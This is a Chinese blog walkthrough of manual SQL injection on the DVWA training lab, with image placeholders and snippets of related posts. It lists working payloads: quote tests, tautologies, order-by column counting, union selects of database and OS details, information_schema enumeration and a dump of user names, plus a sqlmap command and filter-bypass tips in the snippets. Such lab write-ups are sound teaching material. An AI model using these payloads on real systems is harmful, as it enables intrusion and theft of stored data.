2. 程式人生 > >DVWA之php+mysql手工注入

DVWA之php+mysql手工注入

阿新 發佈:2018-11-03

DVWA 頁面
在這裡插入圖片描述

輸入user ID ,輸入 1。看到如下資訊

在這裡插入圖片描述

在此點嘗試注入,輸入‘ ’ ’,判斷其注入型別。
在這裡插入圖片描述

初步判斷是數字型注入,在輸入 " 1 or 1=1 ",嘗試遍歷資料表
在這裡插入圖片描述

判斷字元型:" 1’ or ‘1’='1 "

在這裡插入圖片描述

利用 order by num 來測試查詢表的列, 輸入: " 1’ order by 1 – "(–後有空格)或者 " 1’ order by 1 ## "
在這裡插入圖片描述
在這裡插入圖片描述

當為2時正確顯示,為3時錯誤,我們判斷有2列

在mysql中

user ( )  : 	當前登陸的使用者
database ( ) :	當前資料庫名
version ( ):	資料庫版本

用union聯合查詢,查詢其資訊。注入語法: " 1’ and 1=2 union select user(), database() – "(–後有空格)
在這裡插入圖片描述

在這裡插入圖片描述
在這裡插入圖片描述

用SQL中的全域性變數 " @@global.version_compile_os "來獲得作業系統的資訊
在這裡插入圖片描述

查詢mysql資料庫所有的資料庫名字。語法: " 1’ and 1=1 union select 1,schema_name from information_schema.schemata – "

在這裡插入圖片描述

輸出所有表名 " 1’ union select null,group_concat(table_name) from information_schema.tables where table_schema=‘dvwa’ # "

在這裡插入圖片描述

然後通過手工注入猜解dvwa資料庫表名,語法: " 1’ and exists(select * from users) – "

在這裡插入圖片描述

再猜解欄位名,語法: " 1’ and exists(select first_name from users) – "
在這裡插入圖片描述

在這裡插入圖片描述

嘗試顯示這兩個欄位的內容,語法:" 1 ’ and 1=1 union select first_name,last_name from users – "

在這裡插入圖片描述

相關推薦

DVWAphp+mysql手工注入

DVWA 頁面 輸入user ID ,輸入 1。看到如下資訊 在此點嘗試注入,輸入‘ ’ ’,判斷其注入型別。 初步判斷是數字型注入,在輸入 " 1 or 1=1 ",嘗試遍歷資料表 判斷字元型:" 1’ or ‘1’='1 " 利用 order b

PHP+MySQL手工注入語句大全 MySQL手工注入語句總結

暴欄位長度 Order by num/* 匹配欄位 and 1=1 union select 1,2,3,4,5…….n/* 暴欄位位置 and 1=2 union select 1,2,3,4,5…..n/* 利用內建函式暴資料庫資訊 version() databas

SQL注入系列PHP+Mysql手動注入(一)----數字型

1.常見的幾種SQL注入 1.數字型 2.字元型 3.文字型 4.搜尋型(POST/GET) 5.cookie注入 6.SQL盲注 7.編碼注入 8.寬位元組注入 2.測試原始碼 頁面原

mysql手工注入演示

演示環境準備: php環境,存在漏洞的php指令碼,mysql資料庫以及資料表 php環境直接使用phpstudy即可 存在漏洞的指令碼檔案    <!DOCTYPE html> <html> <head> &l

mysql手工注入總結

mysql的注入,關鍵是要找到注入點,對注入點進行處理,該閉合的引號,括號等要先進行閉合,然後註釋掉多餘的語句 一、稍微總結下幾種閉合方法: 一般來說,程式設計師在書寫select語句時,會對傳入的變數進行一些處理,常見的有如下幾種,這裡以php為例,假設傳輸進來的變數為

MySQL手工注入步驟+直接寫入一句話

(1)判斷注入點 接著通過and 1=1 和 and 1=2測試發現前者正常,後者異常,可以肯定存在注入點,接下來判斷該頁面查詢資料庫的欄位 (2)查詢欄位數 http://unisscan.cn/list.php?lei=246 order by n--

簡單的sql注入2 / writeup (手工注入,純屬練手)

多測試幾次可以發現,空格被註釋了,百度解決方法,用/**/代替空格的位置, 構造語句1'/**/or/**/'1'='1 確認為單引號注入 用order by 確認select欄位數,以確定union的欄位數 可得,只有一個欄位 獲取資料庫  1'/**

SQL注入實戰————1、MySQL手工注入實戰

SQL注入實戰 靶場地址:http://219.153.49.228:48204/show.php?id=MQ== 首先可以看到該URL中存在一個引數“MQ==”,從引數的格式來看是通過了base64進行了加密,那麼我們可以對其進行base64解密 發現解密之後的引

MySQL手工注入進階篇——突破過濾危險字元問題

當我們在進行手工注入時,有時候會發現咱們構造的危險字元被過濾了,接下來,我就教大家如何解決這個問題。下面是我的實戰過程。這裡使用的是墨者學院的線上靶場。咱們直接開始。 第一步,判斷注入點。 通過測試發現,這裡過濾了空格和等於號。所以咱們用/**/代替空格,用like代替=,最後將構造的語句進行url編碼,使用

php+mysql+ajax實現淘寶客服或阿裏旺旺聊天功能 前臺頁面

group -a com 現在 中間 數據 bottom margin -m 首先來看一下我已經實現的效果圖: 消費者頁面:(本篇隨筆) (1)會顯示店主的頭像 (2)當前用戶發送信息顯示在右側,接受的信息,顯示在左側 店主或客服頁面:(下一篇隨筆) (1)在左側有一個列

php+mysql+ajax實現淘寶客服或阿裏旺旺聊天功能 後臺頁面

聯系人 http esc hold 聊天內容 12px onclick onf pda 在上一篇隨筆中,我們已經看了如何實現前臺的對話功能;前臺我限定了店主只有一人,店鋪只有一個,所有比較單一,但後臺就不一樣了,而後臺更像是我們常見的聊天軟件;當然,前臺也應該實現這種效果,

PHP MYSQL 增刪改查增 jsonAdd

應該 php mysql 網站建設 text pos root pass cap _array <?php //header("Content-type: text/html; charset=UTF8"); //header("Content-Type: text

PHP MYSQL 增刪改查list JsonList

arr roo pass int close lose 127.0.0.1 for 數據 <?php //header("Content-type: text/html; charset=UTF8"); //header("Content-Type: text/ht

PHP MYSQL 增刪改查刪 jsonDel

let ade content sql數據庫 pre state 網站建設 password roo <?php //header("Content-type: text/html; charset=UTF8"); //header("Content-Type: t

dvwa命令列注入

  在只需要資料的地方惡意插入了命令,而系統沒有過濾時會造成命令列注入。dvwa提供了練習的地方   正常情況下這是用來測試網址能否連線    1.Security:Low   一旦我們插入惡意命令127.0.0.1&&net user就能發現命令被成功執行了  

DVWAsqlmap post登入過注入

**利用sqlmap過DVWA滲透環境中的注入題** 一開始利用常規語句進行注入會發現注入不了,看了語句提示會重定向到登入框,所以要對post掉登入這個過程。 教程看下面連結 https://blog.

PHP+MySQL實現簡單的登入(SQL注入入門實驗)

本實驗是入門級的SQL注入實驗,手工注入吧,用sqlmap就沒意思了,簡單過程:使用者輸入使用者和密碼然後提交,服務端收到使用者和密碼並查詢資料庫輸出到頁面。一、建立資料庫create database web1;建立兩張表,一張儲存登入使用者和密碼,另一張儲存flag:cr

sqlmap(四)----Mysql注入實戰

(1) 查詢資料庫 sqlmap.py -u "http://localhost/sqls/index.php?id=123" --dbs 資料庫有8個。 (2) 通過第一步的資料庫查詢表(

Mysql資料庫的mysql Schema 到底有哪些東西& 手工注入的基礎要領

mysql> select * from information_schema.tables;   # 包含所有的表名 ,38 rows in set (0.09 sec) 表示有38張表 mysql> select count(*) from information_schema.tables;

nginx+php+mysql+vsftp伺服器注意點

一.nginx的啟動 在 Unix-like 系統上, 非 root 使用者只能使用 1024 之上的埠。所以, 預設的 80 埠就無效了。網上查了下主要有兩種方法,一種是利用埠對映nginx配置如8080埠,同時將80埠影射到8080上,還有一種辦法是直接通過80埠啟